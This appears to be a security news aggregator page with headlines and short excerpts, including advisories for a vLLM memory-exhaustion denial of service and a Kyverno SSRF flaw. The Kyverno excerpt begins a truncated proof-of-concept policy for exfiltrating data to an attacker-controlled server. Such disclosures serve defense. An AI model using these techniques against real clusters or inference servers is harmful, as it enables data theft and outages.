Security
Headlines
HeadlinesLatestCVEs

Latest News

Here’s What Happened to Those SignalGate Messages

A lawsuit over the Trump administration’s infamous Houthi Signal group chat has revealed what steps departments took to preserve the messages—and how little they actually saved.

Wired
#intel#sap#ssl
GHSA-hf3c-wxg2-49q9: vLLM vulnerable to Denial of Service by abusing xgrammar cache

### Impact This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3 The [xgrammar](https://xgrammar.mlc.ai/docs/) library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the `guided_decoding_backend` key of the `extra_body` field ...

GHSA-459x-q9hg-4gpq: Kyverno vulnerable to SSRF via Service Calls

### Summary An attacker with the ability to create Kyverno policies in a Kubernetes cluster can use Service Call functionality to perform SSRF to a server under their control in order to exfiltrate data. ### Details According to the documentation, Service Call is intended to address services located inside the Kubernetes cluster, but this method can also resolve external addresses, which allows making requests outside the Kubernetes cluster. https://kyverno.io/docs/writing-policies/external-data-sources/#variables-from-service-calls ### PoC Create a slightly modified Cluster Policy from the documentation. In the url we specify the address of a server controlled by the attacker, for example Burp Collaborator. ```yaml apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: check-namespaces spec: rules: - name: call-extension match: any: - resources: kinds: - ConfigMap context: - name: result apiCall: method: P...

Operation BULUT: Encrypted Chats from Sky ECC, ANOM Lead to 232 Arrests

Intelligence from encrypted platforms like Sky ECC and ANOM has led to the arrest of 232 individuals and…

Max Severity Bug in Apache Roller Enabled Persistent Access

The remediated flaw gave adversaries a way to maintain access to the app through password resets.

With AI's Help, Bad Bots Are Taking Over the Web

Bad bots are becoming increasingly difficult to detect as they more easily mimic human behaviors and utilize evasion techniques, researchers say.

AI-Powered Presentation Tool Leveraged in Phishing Attacks

Researchers at Abnormal Security said threat actors are using a legitimate presentation and graphic design tool named "Gamma" in phishing attacks.

Best Crypto Tax Software in 2025: A Comprehensive Guide

Keeping up with crypto tax laws in Europe feels like a constant hurdle. Regulations evolve, tax authorities demand…

4chan Breached? Hacker from Rival Soyjak Forum Claims Source Code Leak

4chan is down amid claims from a rival Soyjak forum user who says they’ve breached the site and…

Suspected 4chan Hack Could Expose Longtime, Anonymous Admins

Though the exact details of the situation have not been confirmed, community infighting seems to have spilled out in a breach of the notorious image board.